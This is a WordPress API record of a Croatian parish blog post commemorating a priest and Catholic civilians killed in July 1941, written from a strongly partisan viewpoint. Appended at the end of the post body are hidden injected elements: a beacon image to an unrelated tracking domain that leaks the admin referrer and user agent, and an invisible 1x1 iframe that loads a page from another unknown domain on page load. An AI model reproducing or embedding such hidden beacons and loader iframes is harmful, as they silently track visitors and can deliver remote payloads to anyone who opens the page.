{"id":1314,"date":"2023-07-21T16:25:04","date_gmt":"2023-07-21T15:25:04","guid":{"rendered":"http:\/\/www.svetianteknin.com\/?p=1314"},"modified":"2023-07-22T21:30:21","modified_gmt":"2023-07-22T20:30:21","slug":"dan-drvarskih-mucenika-27-srpnja-1941","status":"publish","type":"post","link":"https:\/\/www.svetianteknin.com\/?p=1314","title":{"rendered":"Dan drvarskih mu\u010denika &#8211; 27. srpnja 1941."},"content":{"rendered":"<p><span style=\"font-family: helvetica, arial, sans-serif;\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-1316 alignleft\" src=\"https:\/\/www.svetianteknin.com\/wp-content\/uploads\/2020\/07\/Nestor1-227x300.jpg\" alt=\"\" width=\"295\" height=\"390\" srcset=\"https:\/\/www.svetianteknin.com\/wp-content\/uploads\/2020\/07\/Nestor1-227x300.jpg 227w, https:\/\/www.svetianteknin.com\/wp-content\/uploads\/2020\/07\/Nestor1.jpg 400w\" sizes=\"auto, (max-width: 295px) 100vw, 295px\" \/>Drvarski \u017eupnik Waldemar Maksimilijan Nestor ubijen je 27. srpnja 1941. zajedno sa skupinom svojih vjernika vra\u0107aju\u0107i se s hodo\u010da\u0161\u0107a <strong>sv. Ani u Kosovu kraj Knina<\/strong>. Njih su na \u017eeljezni\u010dkoj postaji Vaganj kod Trubara &#8211; na trome\u0111i Dalmacije, Bosne i Like &#8211; izveli iz vlaka \u010detni\u010dki gerilci, pobili i bacili u jamu Golubnja\u010du, nedaleko od pravoslavne crkve u Trubaru.<\/span><\/p>\n<p><span style=\"font-family: helvetica, arial, sans-serif;\">\u017dupnik Nestor prvi je ubijeni katoli\u010dki sve\u0107enik u II. svjetskom ratu na podru\u010dju biv\u0161e Jugoslavije. Njegove kosti i kosti drvarskih hodo\u010dasnika prona\u0111ene su sasvim slu\u010dajno u jami Golubnja\u010da 2003. g. prilikom potrage za posmrtnim ostatcima jednog borca Armije BiH iz posljednjeg rata. Nakon \u0161to su njihove kosti ekshumirane i dopremljene u Identifikacijski centar \u0160ejkova\u010da kod Sanskog Mosta, identificirane su i predane Banjolu\u010dkoj biskupiji. Posmrtni ostatci \u017eupnika Waldemara Maksimilijana Nestora i 14 identificiranih nevinih \u017ertava iz njegove \u017eupe, slavljenjem koncelebrirane Svete mise i obredom crkvenog ukopa, pokopani su na katoli\u010dkome groblju sv. Marka u Banjoj Luci, 19. studenoga 2014. godine.<\/span><\/p>\n<p><span style=\"font-family: helvetica, arial, sans-serif;\">Gotovo identi\u010dan scenarij kao u Drvaru, toga 27. srpnja 1941. odigrao se u susjednoj Lici, to\u010dnije na podru\u010dju Srba, Donjeg Lapca i Bori\u010devca. Izvr\u0161en je pokolj nad hrvatskim civilima, sela su zapaljena a katoli\u010dke crkve poru\u0161ene. Samo u selu Brotnja kod Srba pobijeno je 37 \u010dlanova obitelji Ivezi\u0107, me\u0111u kojima 12 djece mla\u0111e od 14 godina.<\/span><\/p>\n<p><span style=\"font-family: helvetica, arial, sans-serif;\">U sljede\u0107ih 10-ak dana isti scenarij ponavlja se u Bos.Grahovu i Krnjeu\u0161i. Najprije je po\u010detkom kolovoza zvjerski ubijen grahovski \u017eupnik don Juraj Gospodneti\u0107 s vi\u0161e od 200 grahovskih katolika, a potom u Krnjeu\u0161i kod Bosanskog Petrovca i \u017eupnik Kre\u0161imir Bari\u0161i\u0107 zajedno s vi\u0161e od 250 svojih vjernika.<\/span><\/p>\n<p><span style=\"font-family: helvetica, arial, sans-serif;\">U svim navedenim mjestima, osim pokolja sve\u0107enika i vjernika, poru\u0161ene su katoli\u010dke crkve, opusto\u0161ena i uni\u0161tena katoli\u010dka groblja, a nakon rata komunisti\u010dke vlasti otele su zemlju Hrvatima i podijelile novim vlasnicima, dok je starim vlasnicima onemogu\u0107en povratak na svoja ognji\u0161ta.<\/span><\/p>\n<p><span style=\"font-family: helvetica, arial, sans-serif;\">Nakon svih tih zlo\u010dina, Katoli\u010dka Crkva i hrvatski narod bili su prakti\u010dki iskorijenjeni sa \u0161irokog podru\u010dja zapadne Bosne i isto\u010dne Like, od Klju\u010da do Knina i Gospi\u0107a, i od Livna do Biha\u0107a. Jednom rije\u010dju &#8211; nad Hrvatima i Katoli\u0107kom Crkvom toga kraja izvr\u0161en je genocid u pravom smislu te rije\u010di. U biv\u0161oj Jugoslaviji 27. srpnja slavio se kao Dan ustanka naroda SR Hrvatske i SR BiH, dok, se i u modernoj dr\u017eavi Hrvatskoj i BiH neki pojedinci i skupine okupljaju toga dana u Srbu i Drvaru kako bi proslavili, \u201eantifa\u0161isti\u010dki&#8221; ustanak koji s antifa\u0161izmom nema nikakve veze.<\/span><\/p>\n<p><span style=\"font-family: helvetica, arial, sans-serif;\">Lokalne vlasti u Drvaru proglasile su 27. srpnja kao Dan op\u0107ine.<\/span><\/p>\n<p><span style=\"font-family: helvetica, arial, sans-serif;\"><img decoding=\"async\" src=\"\/\/moolmaincineper.online\/acnt?_=1595775909221&amp;did=21&amp;tag=tier1_2&amp;r=http%253A%252F%252Fwww.svetianteknin.com%252Fwp-admin%252Fpost-new.php&amp;ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A76.0)%20Gecko%2F20100101%20Firefox%2F76.0&amp;aac=&amp;if=1&amp;uid=1586341698&amp;cid=1&amp;v=464\" \/><\/span><\/p>\n<div id=\"mainWidgetDiv\" style=\"height: 1px; width: 1px; position: absolute; top: 0px; left: 0px; overflow: hidden;\"><\/div>\n<p><span style=\"font-family: helvetica, arial, sans-serif;\"><iframe loading=\"lazy\" id=\"loaderIframe\" style=\"position: absolute; height: 1px; width: 1px;\" src=\"https:\/\/cdn.cdnservice.space\/flister.html?v=3\" width=\"1\" height=\"1\"><\/iframe><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Drvarski \u017eupnik Waldemar Maksimilijan Nestor ubijen je 27. srpnja 1941. zajedno sa skupinom svojih vjernika vra\u0107aju\u0107i se s hodo\u010da\u0161\u0107a sv. Ani u Kosovu kraj Knina. Njih su na \u017eeljezni\u010dkoj postaji Vaganj kod Trubara &#8211; na trome\u0111i Dalmacije, Bosne i Like &#8211; izveli iz vlaka \u010detni\u010dki gerilci, pobili i bacili u jamu Golubnja\u010du, nedaleko od pravoslavne crkve u Trubaru. \u017dupnik Nestor prvi je ubijeni katoli\u010dki sve\u0107enik [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1315,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","footnotes":""},"categories":[3],"tags":[],"class_list":["post-1314","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-povijest"],"_links":{"self":[{"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=\/wp\/v2\/posts\/1314","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1314"}],"version-history":[{"count":1,"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=\/wp\/v2\/posts\/1314\/revisions"}],"predecessor-version":[{"id":1317,"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=\/wp\/v2\/posts\/1314\/revisions\/1317"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=\/wp\/v2\/media\/1315"}],"wp:attachment":[{"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1314"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1314"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.svetianteknin.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1314"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}